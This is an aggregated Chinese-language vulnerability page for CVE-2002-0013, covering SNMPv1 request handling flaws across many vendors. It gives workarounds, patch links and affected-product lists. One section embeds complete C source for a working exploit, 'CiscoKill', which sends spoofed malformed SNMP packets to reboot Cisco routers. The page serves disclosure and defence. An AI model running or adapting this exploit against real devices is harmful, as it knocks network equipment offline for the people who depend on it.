CVE-2002-0013
CVSS10.0
发布时间 :2002-02-13 00:00:00
修订时间 :2008-09-10 15:11:03
NMCOES    

[原文]Vulnerabilities in the SNMPv1 request handling of a large number of SNMP implementations allow remote attackers to cause a denial of service or gain privileges via (1) GetRequest, (2) GetNextRequest, and (3) SetRequest messages, as demonstrated by the PROTOS c06-SNMPv1 test suite. NOTE: It is highly likely that this candidate will be SPLIT into multiple candidates, one or more for each vendor. This and other SNMP-related candidates will be updated when more accurate information is available.


[CNNVD]多家厂商SNMP实现中SNMPv1请求处理存在多个安全漏洞(CNNVD-200202-004)

        
        SNMP请求是管理系统给代理系统发送的消息,它们通常询问代理系统当前性能和配置信息,请求Management Information Base (MIB)的下一个SNMP对象,或者修改代理的配置。
        许多SNMP的实现被发现了多个漏洞。这些漏洞发生在SNMP信息的解码和解释的处理上。
        PROTOS小组开发的c06-SNMPv1测试工具已经发现众多厂商的SNMP实现中对SNMP请求的处理中存在大量的安全问题,攻击者可能通过GetRequest、GetNextRequest、SetRequest命令来使远程SNMP服务器崩溃甚至以SNMP服务器运行权限执行任意代码。各种受影响产品各自的影响程度各不一致。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-264 [权限、特权与访问控制]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:87SNMPv1 Request Handling DoS and Privilege Escalation
oval:org.mitre.oval:def:298Windows 2000 SNMPv1 Trap Handling DoS and Privilege Escalation (Test 2)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0013
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0013
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200202-004
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/854306
(VENDOR_ADVISORY)  CERT-VN  VU#854306
http://www.cert.org/advisories/CA-2002-03.html
(VENDOR_ADVISORY)  CERT  CA-2002-03
http://www.microsoft.com/technet/security/bulletin/MS02-006.asp
(VENDOR_ADVISORY)  MS  MS02-006
http://sunsolve.sun.com/search/document.do?assetkey=1-26-57404-1
(VENDOR_ADVISORY)  SUNALERT  57404
ftp://patches.sgi.com/support/free/security/advisories/20020201-01-A
(VENDOR_ADVISORY)  SGI  20020201-01-A
http://www.redhat.com/support/errata/RHSA-2001-163.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2001:163
http://www.iss.net/security_center/alerts/advise110.php
(VENDOR_ADVISORY)  ISS  20020212 PROTOS Remote SNMP Attack Tool
http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/snmpv1/index.html
(UNKNOWN)  MISC  http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/snmpv1/index.html

- 漏洞信息

多家厂商SNMP实现中SNMPv1请求处理存在多个安全漏洞
危急 未知
2002-02-13 00:00:00 2005-10-20 00:00:00
远程  
        
        SNMP请求是管理系统给代理系统发送的消息,它们通常询问代理系统当前性能和配置信息,请求Management Information Base (MIB)的下一个SNMP对象,或者修改代理的配置。
        许多SNMP的实现被发现了多个漏洞。这些漏洞发生在SNMP信息的解码和解释的处理上。
        PROTOS小组开发的c06-SNMPv1测试工具已经发现众多厂商的SNMP实现中对SNMP请求的处理中存在大量的安全问题,攻击者可能通过GetRequest、GetNextRequest、SetRequest命令来使远程SNMP服务器崩溃甚至以SNMP服务器运行权限执行任意代码。各种受影响产品各自的影响程度各不一致。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时关闭SNMP服务。如果您不需要SNMP服务,您应该立刻关闭它。
        * 在边界路由器或者防火墙上限制对受保护网络的SNMP服务端口的访问。
        通常需要限制的端口是:
        snmp 161/udp # Simple Network Management Protocol (SNMP)
        snmp 162/udp # SNMP system management messages
        在某些受影响产品中,下列服务也需要进行限制:
        snmp 161/tcp # Simple Network Management Protocol (SNMP)
        snmp 162/tcp # SNMP system management messages
        smux 199/tcp # SNMP Unix Multiplexer
        smux 199/udp # SNMP Unix Multiplexer
        synoptics-relay 391/tcp # SynOptics SNMP Relay Port
        synoptics-relay 391/udp # SynOptics SNMP Relay Port
        agentx 705/tcp # AgentX
        snmp-tcp-port 1993/tcp # cisco SNMP TCP port
        snmp-tcp-port 1993/udp # cisco SNMP TCP port
        另外,某些和SNMP相关的RPC服务也可能需要限制:
        snmp 100122 na.snmp snmp-cmc snmp-synoptics snmp-unisys snmp-utk
        snmpv2 100138 na.snmpv2 # SNM Version 2.2.2
        snmpXdmid 100249
        * 禁止来自未经授权的内部主机的SNMP访问。
        由于通常只有少数管理主机需要进行SNMP访问,您可以在SNMP Agent主机上进行访问控制,禁止来自未经授权的内部主机的SNMP访问请求。
        * 改变缺省SNMP口令。
        改变缺省的只读和可写口令,例如"public"、"private",可以防止部分的攻击。但是仍然有一些攻击甚至无需有效的口令。
        厂商补丁:
        3Com
        ----
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        3com PS Hub 40 :
        3com Upgrade psh02_16.exe
        ftp://ftp.3com.com/pub/superstack-ii/superstack-ii-ps-hub-40/psh02_16.exe
        3com PS Hub 50 :
        3com Upgrade psf02_16.exe
        ftp://ftp.3com.com/pub/superstack-ii/superstack-ii-ps-hub-50/psf02_16.exe
        3com Dual Speed Hub :
        3com Upgrade dsh02_16.exe
        ftp://ftp.3com.com/pub/superstack-ii/superstack-ii-hub-500/dsh02_16.exe
        3com Switch 1100 :
        3com Upgrade s2s02_68.exe
        ftp://ftp.3com.com/pub/superstack-ii/superstack-ii-1100/s2s02_68.exe
        3com Switch 4400 :
        3com Upgrade s3m02_02.exe
        ftp://ftp.3com.com/pub/superstack_3/switch_4400/s3m02_02.exe
        3com Switch 4900 :
        3com Upgrade s3g02_04.exe
        
        http://www.3com.com/en_US/layer3/register.html

        3com Switch 3300 :
        3com Upgrade s2s02_68.exe
        ftp://ftp.3com.com/pub/superstack-ii/superstack-ii-1100/s2s02_68.exe
        3com WebCache 1000 :
        3com Upgrade s3b_02_00.bin
        ftp://ftp.3com.com/pub/webcache/agents/s3b_02_00.bin
        3com WebCache 3000 :
        3com Upgrade s3b_02_00.bin
        ftp://ftp.3com.com/pub/webcache/agents/s3b_02_00.bin
        Caldera
        -------
        Caldera已经为此发布了一个安全公告(CSSA-2002-SCO.4)以及相应补丁:
        CSSA-2002-SCO.4:Open UNIX, UnixWare 7: snmpd memory fault
        链接:ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.4
        补丁下载:
        Caldera UnixWare 7:
        Caldera OpenServer 5.0:
        Caldera UnixWare 7.1.0:
        Caldera Patch erg711937c.Z
        ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.4/erg711937c.Z
        Caldera UnixWare 7.1.1:
        Caldera Patch erg711937b.Z
        ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.4/erg711937b.Z
        Caldera OpenUnix 8.0:
        Caldera Patch erg711937.Z
        ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.4/erg711937.Z
        Cisco
        -----
        Cisco已经为此发布了一个安全公告(Cisco-malformed-snmp-msgs-pub)以及相应补丁:
        Cisco-malformed-snmp-msgs-pub:Malformed SNMP Message-Handling Vulnerabilities
        链接:
        http://www.cisco.com/warp/public/707/cisco-malformed-snmp-msgs-pub.shtml

        Debian
        ------
        Debian已经为此发布了一个安全公告(DSA-111-1)以及相应补丁:
        DSA-111-1:Multiple SNMP vulnerabilities
        链接:
        http://www.debian.org/security/2002/dsa-111

        补丁下载:
        Debian Upgrade libsnmp4.1-dev_4.1.1-2.1_alpha.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/libsnmp4.1-dev_4.1.1-2.1_alpha.deb

        Debian Upgrade libsnmp4.1_4.1.1-2.1_alpha.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/libsnmp4.1_4.1.1-2.1_alpha.deb

        Debian Upgrade snmp_4.1.1-2.1_alpha.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/snmp_4.1.1-2.1_alpha.deb

        Debian Upgrade snmpd_4.1.1-2.1_alpha.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/snmpd_4.1.1-2.1_alpha.deb

        Debian Upgrade libsnmp4.1-dev_4.1.1-2.1_arm.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-arm/libsnmp4.1-dev_4.1.1-2.1_arm.deb

        Debian Upgrade libsnmp4.1_4.1.1-2.1_arm.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-arm/libsnmp4.1_4.1.1-2.1_arm.deb

        Debian Upgrade snmp_4.1.1-2.1_arm.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-arm/snmp_4.1.1-2.1_arm.deb

        Debian Upgrade snmpd_4.1.1-2.1_arm.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-arm/snmpd_4.1.1-2.1_arm.deb

        Debian Upgrade libsnmp4.1-dev_4.1.1-2.1_i386.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-i386/libsnmp4.1-dev_4.1.1-2.1_i386.deb

        Debian Upgrade libsnmp4.1_4.1.1-2.1_i386.deb
        

- 漏洞信息 (21296)

Cisco IOS 11/12 Malformed SNMP Message Denial of Service Vulnerabilities (EDBID:21296)
hardware dos
2002-02-12 Verified
0 kundera
N/A [点击下载]
source: http://www.securityfocus.com/bid/4132/info

Cisco products contain multiple vulnerabilities in handling of SNMP requests and traps. A general report for multiple vendors was initially published on February 12 (Bugtraq IDs 4088 and 4089), however more information is now available and a separate Bugtraq ID has been allocated for the Cisco Operating Systems and Appliances vulnerabilities.

It is reportedly possible for a remote attacker to create a denial of service condition by transmitting a malformed SNMP request to a vulnerable Cisco Operating System or Appliance. The affected device may reset, or require a manual reset to regain functionality. 

/* This program send a spoofed snmpv1 get request that cause system reboot
   on Cisco 2600 routers with IOS version 12.0(10) 

   Author : kundera@tiscali.it   ... don't be lame use for testing only! ..:) */

#include 		<stdio.h>
#include 		<string.h>
#include 		<unistd.h>
#include 		<stdlib.h>
#include 		<sys/socket.h>
#include 		<netinet/in.h>
#include		<netinet/ip.h>
#include		<netinet/udp.h>
#include		<arpa/inet.h>

	

struct in_addr sourceip_addr;
struct in_addr destip_addr;
struct sockaddr_in dest;

struct ip          *IP;  
struct udphdr      *UDP;   
int p_number=1,sok,datasize,i=0; 

char *packet,*source,*target; 
char *packetck;
char *data,c;

char snmpkill[] =  
  "\x30\x81\xaf\x02\x01\x00\x04\x06\x70\x75\x62\x6c\x69\x63\xa0\x81"  
  "\xa1\x02\x02\x09\x28\x02\x01\x00\x02\x01\x00\x30\x81\x94\x30\x81"  
  "\x91\x06\x81\x8c\x4d\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x81\xff\xff\xff\xff\xff\xff\xff\xff\x7f"  
  "\x05";


struct pseudoudp {
u_long ipsource;
u_long ipdest;
char zero;
char proto;
u_short length;
} *psudp;


in_cksum (unsigned short *ptr, int nbytes)
{

  register long sum;		/* assumes long == 32 bits */
  u_short oddbyte;
  register u_short answer;	/* assumes u_short == 16 bits */

  /*
   * Our algorithm is simple, using a 32-bit accumulator (sum),
   * we add sequential 16-bit words to it, and at the end, fold back
   * all the carry bits from the top 16 bits into the lower 16 bits.
   */

  sum = 0;
  while (nbytes > 1)
    {
      sum += *ptr++;
      nbytes -= 2;
    }

  /* mop up an odd byte, if necessary */
  if (nbytes == 1)
    {
      oddbyte = 0;		/* make sure top half is zero */
      *((u_char *) & oddbyte) = *(u_char *) ptr;	/* one byte only */
      sum += oddbyte;
    }

  /*
   * Add back carry outs from top 16 bits to low 16 bits.
   */

  sum = (sum >> 16) + (sum & 0xffff);	/* add high-16 to low-16 */
  sum += (sum >> 16);		/* add carry */
  answer = ~sum;		/* ones-complement, then truncate to 16 bits */
  return (answer);
}


void usage (void)
{
printf("Kundera CiscoKill v1.0\n");
printf("Usage: ciscokill [-n number of packets] [-s source ip_addr] -t ip_target \n");
}



int main(int argc,char **argv){

if (argc < 2){
usage();
exit(1);
}

while((c=getopt(argc,argv,"s:t:n:"))!=EOF){
	switch(c) {
	 case 's': source=optarg; break;
	 case 'n': p_number=atoi(optarg); break;
	 case 't': target=optarg;
	 }
}

if ( (sok=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0)
{
	printf("Can't create socket.\n");
        exit(EXIT_FAILURE);
}

destip_addr.s_addr=inet_addr(target);
sourceip_addr.s_addr=inet_addr(source);

datasize=sizeof(snmpkill);

packet = ( char * )malloc( 20 + 8 + datasize );

IP     = (struct ip     *)packet; 

memset(packet,0,sizeof(packet)); 
        
        IP->ip_dst.s_addr  = destip_addr.s_addr;
        IP->ip_src.s_addr  = sourceip_addr.s_addr;
        IP->ip_v = 4;
        IP->ip_hl = 5;
        IP->ip_ttl = 245;
        IP->ip_id = htons(666);
        IP->ip_p = 17;
        IP->ip_len  = htons(20 + 8 + datasize);
        IP->ip_sum    = in_cksum((u_short *)packet,20);

 
UDP   = (struct udphdr    *)(packet+20);
      UDP->source = htons(666); 
      UDP->dest   = htons(161);
      UDP->len     = htons(8+datasize);
      UDP->check = 0;
      packetck = (char *)malloc(8 + datasize + sizeof(struct pseudoudp));
      bzero(packetck,8 + datasize + sizeof(struct pseudoudp));     
      psudp = (struct pseudoudp *) (packetck);
      psudp->ipdest = destip_addr.s_addr;
      psudp->ipsource = sourceip_addr.s_addr;
      psudp->zero = 0;
      psudp->proto = 17;
      psudp->length = htons(8+datasize);
      memcpy(packetck+sizeof(struct pseudoudp),UDP,8+datasize);
      memcpy(packetck+sizeof(struct pseudoudp)+8,snmpkill,datasize);

      UDP->check = in_cksum((u_short *)packetck,8+datasize+sizeof(struct pseudoudp));    

data   = (unsigned char    *)(packet+20+8); 
memcpy(data,snmpkill,datasize);  
                                                                                                     
dest.sin_family=AF_INET;
dest.sin_addr.s_addr=destip_addr.s_addr;                                                                        

while (i<p_number)
{
if (( sendto(sok,packet,20+8+datasize,0,( struct sockaddr * ) &dest,sizeof(dest)))<0)
{
printf("Error sending packet.\n");
exit(EXIT_FAILURE);
}

i++;

}
printf("%d packets sent.\n",i);

}




		

- 漏洞信息

2321
Emulex FibreChannel Hub SNMP Trap DoS
Denial of Service
Loss of Availability

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-07-28 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor SNMP Request Handling Vulnerabilities
Unknown 4089
Yes No
2002-02-12 12:00:00 2009-07-11 10:56:00
Discovered by the Oulu University Secure Programming Group.

- 受影响的程序版本

Sun SunNet Manager Sparc 2.3
Sun SunNet Manager Intel 2.3
Sun SunMC 3.0 RR
- Sun Solaris 2.5.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Sun SunMC 3.0
- Sun Solaris 2.5.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Sun SunMC 2.1.1
Sun SunATM 5.0
Sun SunATM 4.0.1
- Sun Solaris 2.5.1
- Sun Solaris 2.7
- Sun Solaris 2.6
Sun SunATM 3.0.1
Sun SunATM 2.1
- Sun Solaris 2.5.1
- Sun Solaris 2.6
Sun Enterprise 10000 Server SSP 3.5
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Sun Enterprise 10000 Server SSP 3.4
Sun Enterprise 10000 Server SSP 3.3
SNMP Research Mid-Level Manager 15.3
SNMP Research Enterpol 15.3
SNMP Research DR-Web Manager 15.3
SGI Emulex 1Gbit FibreChannel Hub
SGI Brocade 2.6 .0
RedBack Networks AOS
Real Networks RealPlayer Intranet 5.0
Process Software TCPWare 5.5
Process Software Multinet 4.4
Oracle Enterprise Manager 9.0.1
Oracle Enterprise Manager 2.2
Oracle Enterprise Manager 2.1
Oracle Enterprise Manager 2.0
Oracle Enterprise Manager 1.6.5
Novell Netware 6.0
Novell Netware 5.1
Novell Netware 5.0
Novell Netware 4.11
Novell Netware 4.2
Novell Netware 4.0
Nokia IPSO 3.4.1
+ Check Point Software Firewall-1 4.1 SP5
+ Check Point Software Firewall-1 4.1 SP5
+ Check Point Software Firewall-1 4.1 SP4
+ Check Point Software Firewall-1 4.1 SP4
+ Check Point Software Firewall-1 4.1 SP3
+ Check Point Software Firewall-1 4.1 SP3
+ Check Point Software Firewall-1 4.1 SP2
+ Check Point Software Firewall-1 4.1 SP2
+ Check Point Software Firewall-1 4.1 SP1
+ Check Point Software Firewall-1 4.1 SP1
+ Check Point Software Firewall-1 4.1
+ Check Point Software Firewall-1 4.1
+ Check Point Software VPN-1 4.1 SP4
+ Check Point Software VPN-1 4.1 SP4
+ Check Point Software VPN-1 4.1 SP3
+ Check Point Software VPN-1 4.1 SP3
+ Check Point Software VPN-1 4.1 SP2
+ Check Point Software VPN-1 4.1 SP2
+ Check Point Software VPN-1 4.1 SP1
+ Check Point Software VPN-1 4.1 SP1
+ Check Point Software VPN-1 4.1
+ Check Point Software VPN-1 4.1
Nokia IPSO 3.4
+ Check Point Software Firewall-1 4.1 SP5
+ Check Point Software Firewall-1 4.1 SP5
+ Check Point Software Firewall-1 4.1 SP4
+ Check Point Software Firewall-1 4.1 SP4
+ Check Point Software Firewall-1 4.1 SP3
+ Check Point Software Firewall-1 4.1 SP3
+ Check Point Software Firewall-1 4.1 SP2
+ Check Point Software Firewall-1 4.1 SP2
+ Check Point Software Firewall-1 4.1 SP1
+ Check Point Software Firewall-1 4.1 SP1
+ Check Point Software Firewall-1 4.1
+ Check Point Software Firewall-1 4.1
+ Check Point Software VPN-1 4.1 SP4
+ Check Point Software VPN-1 4.1 SP4
+ Check Point Software VPN-1 4.1 SP3
+ Check Point Software VPN-1 4.1 SP3
+ Check Point Software VPN-1 4.1 SP2
+ Check Point Software VPN-1 4.1 SP2
+ Check Point Software VPN-1 4.1 SP1
+ Check Point Software VPN-1 4.1 SP1
+ Check Point Software VPN-1 4.1
+ Check Point Software VPN-1 4.1
+ Nokia IP380
+ Nokia IP380
Nokia IPSO 3.3.1
Nokia IPSO 3.3
Nokia IPSO 3.1.3
Net-SNMP ucd-snmp 4.2.1
Net-SNMP ucd-snmp 4.1.1
Microsoft Windows XP Professional
Microsoft Windows XP Home
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows 98SE
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Lotus Domino SNMP Agents 5.0.1 Solaris x86
+ Lotus Domino 5.0.9 a
+ Lotus Domino 5.0.9
+ Lotus Domino 5.0.8
+ Lotus Domino 5.0.7 a
+ Lotus Domino 5.0.7
+ Lotus Domino 5.0.6
+ Lotus Domino 5.0.5
+ Lotus Domino 5.0.4
+ Lotus Domino 5.0.3
+ Lotus Domino 5.0.2
+ Lotus Domino 5.0.1
+ Lotus Domino 5.0
Lotus Domino SNMP Agents 5.0.1 Solaris SPARC
Lotus Domino SNMP Agents 5.0.1 HP-UX
Lantronix LRS
Juniper Networks JUNOS 5.1
Juniper Networks JUNOS 5.0
Innerdive Solutions Router IP Console 3.3 .0.406
IBM AIX 4.3.3
IBM AIX 4.3.2
IBM AIX 4.3.1
IBM AIX 4.3
IBM AIX 5.1
HP Secure OS software for Linux 1.0
HP Procurve Switch 8000M
HP Procurve Switch 4108GL-bundle
HP Procurve Switch 4108GL
HP Procurve Switch 4000M
HP Procurve Switch 2525
HP Procurve Switch 2524
HP Procurve Switch 2512
HP Procurve Switch 2424M
HP Procurve Switch 2400M
HP Procurve Switch 1600M
HP OV/SAM 3.0.1
HP OpenView Network Node Manager 6.10
HP OpenView Network Node Manager 6.2 Solaris
HP OpenView Network Node Manager 6.2 HP-UX 11.X
HP OpenView Network Node Manager 6.2 HP-UX 10.X
HP OpenView Network Node Manager 6.2
HP OpenView Network Node Manager 6.1 Solaris
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5
- Sun Solaris 2.4
HP OpenView Network Node Manager 6.1 HP-UX 11.X
HP OpenView Network Node Manager 6.1 HP-UX 10.X
HP OpenView Network Node Manager 6.0 Solaris
HP OpenView Network Node Manager 6.0 NT 4.X/Windows 2000
HP OpenView Network Node Manager 6.0 HP-UX 11.X
HP OpenView Network Node Manager 6.0 HP-UX 10.20
HP OpenView Network Node Manager 5.0.2 Windows NT 3.51/4.0
HP OpenView Network Node Manager 5.0 1 Solaris
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5
- Sun Solaris 2.4
HP OpenView Network Node Manager 5.0 1 HP-UX
- HP HP-UX 10.34
- HP HP-UX 10.30
- HP HP-UX 10.20
- HP HP-UX 10.16
- HP HP-UX 10.10
- HP HP-UX 10.9
- HP HP-UX 10.8
- HP HP-UX 10.1 0
- HP HP-UX 10.0 1
- HP HP-UX 10.0
- HP HP-UX (VVOS) 10.24
HP OpenView Network Node Manager 5.0 1
- HP HP-UX 11.0
- HP HP-UX 10.20
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
HP OpenView Network Node Manager 4.1 1 Solaris
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5
- Sun Solaris 2.4
HP OpenView Network Node Manager 4.1 1 HP-UX
HP OpenView Extensible SNMP Agent 4.0
HP OpenView Emanate SNMP Agent 14.2 Solaris 2.X
HP OpenView Emanate SNMP Agent 14.2 HP-UX 11.X
HP OpenView Emanate SNMP Agent 14.2 HP-UX 10.20
HP OpenView Distributed Management 6.0
HP OpenView Distributed Management 5.0 3
HP MPE/iX 6.5
HP MPE/iX 6.0
HP MPE/iX 5.5
HP MPE/iX 5.0
HP MPE/iX 4.5
HP MPE/iX 4.0
HP MC/ServiceGuard
HP JetDirect x.20.00
HP JetDirect x.08.00
HP ITO/VPO/OVO Unix 6.0
HP HP-UX (VVOS) 11.0 4
HP HP-UX (VVOS) 10.24
HP HP-UX 11.20
HP HP-UX 11.11
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 10.10
HP HP-UX 10.0
HP EMS A.03.20
HP EMS A.03.10
HP EMS A.03.00
GNU gzip 3.1 .02
Comtek Services NMServer 3.4
- Compaq OpenVMS 7.3 VAX
- Compaq OpenVMS 7.3 Alpha
- Compaq OpenVMS 7.2 -2 Alpha
- Compaq OpenVMS 7.2 -1H1 Alpha
- Compaq OpenVMS 7.2 VAX
- Compaq OpenVMS 7.1 -2 Alpha
- Compaq OpenVMS 7.1 VAX
- Compaq OpenVMS 7.1 Alpha
- Compaq OpenVMS 6.2 VAX
- Compaq OpenVMS 6.2 Alpha
- Compaq OpenVMS 6.2
Computer Associates Unicenter
Caldera UnixWare 7.1.1
Caldera UnixWare 7.1 .0
Caldera UnixWare 7
Caldera OpenUnix 8.0
Caldera OpenServer 5.0.6
Caldera OpenServer 5.0.5
CacheFlow CacheOS 4.0.14
CacheFlow CacheOS 4.0.13
CacheFlow CacheOS 4.0.12
CacheFlow CacheOS 4.0.11
CacheFlow CacheOS 4.0
CacheFlow CacheOS 3.1.21
CacheFlow CacheOS 3.1.19
CacheFlow CacheOS 3.1.18
CacheFlow CacheOS 3.1.17
CacheFlow CacheOS 3.1.16
CacheFlow CacheOS 3.1.15
CacheFlow CacheOS 3.1.14
CacheFlow CacheOS 3.1.13
CacheFlow CacheOS 3.1.12
CacheFlow CacheOS 3.1.11
CacheFlow CacheOS 3.1 .20
CacheFlow CacheOS 3.1 .10
CacheFlow CacheOS 3.1 .09
CacheFlow CacheOS 3.1 .08
CacheFlow CacheOS 3.1 .07
CacheFlow CacheOS 3.1 .06
CacheFlow CacheOS 3.1 .05
CacheFlow CacheOS 3.1 .04
CacheFlow CacheOS 3.1 .03
CacheFlow CacheOS 3.1 .02
CacheFlow CacheOS 3.1
CacheFlow CacheOS
AdventNet Web NMS MSP Edition
AdventNet Web NMS
AdventNet SNMP Utilities
AdventNet SNMP API
AdventNet Mediation Server
AdventNet Management Builder
AdventNet Fault Management Toolkit
AdventNet Configuration Management Toolkit
AdventNet CLI API
AdventNet Agent Toolkit Java/JMX Edition
AdventNet Agent Toolkit - C Edition
3Com WebCache 3000
3Com WebCache 1000
3Com Switch 4900
3Com Switch 4400
3Com Switch 3300
3Com Switch 1100
3Com PS Hub 50
3Com PS Hub 40
3Com Dual Speed Hub
SGI Brocade 2.6 .0d
Nokia IPSO 3.4.2
+ Check Point Software Firewall-1 4.1 SP5
+ Check Point Software Firewall-1 4.1 SP5
+ Check Point Software Firewall-1 4.1 SP4
+ Check Point Software Firewall-1 4.1 SP4
+ Check Point Software Firewall-1 4.1 SP3
+ Check Point Software Firewall-1 4.1 SP3
+ Check Point Software Firewall-1 4.1 SP2
+ Check Point Software Firewall-1 4.1 SP2
+ Check Point Software Firewall-1 4.1 SP1
+ Check Point Software Firewall-1 4.1 SP1
+ Check Point Software Firewall-1 4.1
+ Check Point Software Firewall-1 4.1
+ Check Point Software Firewall-1 4.0 SP8
+ Check Point Software Firewall-1 4.0 SP8
+ Check Point Software Firewall-1 4.0 SP7
+ Check Point Software Firewall-1 4.0 SP7
+ Check Point Software Firewall-1 4.0 SP6
+ Check Point Software Firewall-1 4.0 SP6
+ Check Point Software Firewall-1 4.0 SP5
+ Check Point Software Firewall-1 4.0 SP5
+ Check Point Software Firewall-1 4.0 SP4
+ Check Point Software Firewall-1 4.0 SP4
+ Check Point Software Firewall-1 4.0 SP3
+ Check Point Software Firewall-1 4.0 SP3
+ Check Point Software Firewall-1 4.0 SP2
+ Check Point Software Firewall-1 4.0 SP2
+ Check Point Software Firewall-1 4.0 SP1
+ Check Point Software Firewall-1 4.0 SP1
+ Check Point Software Firewall-1 4.0
+ Check Point Software Firewall-1 4.0
+ Check Point Software VPN-1 4.1 SP4
+ Check Point Software VPN-1 4.1 SP4
+ Check Point Software VPN-1 4.1 SP3
+ Check Point Software VPN-1 4.1 SP3
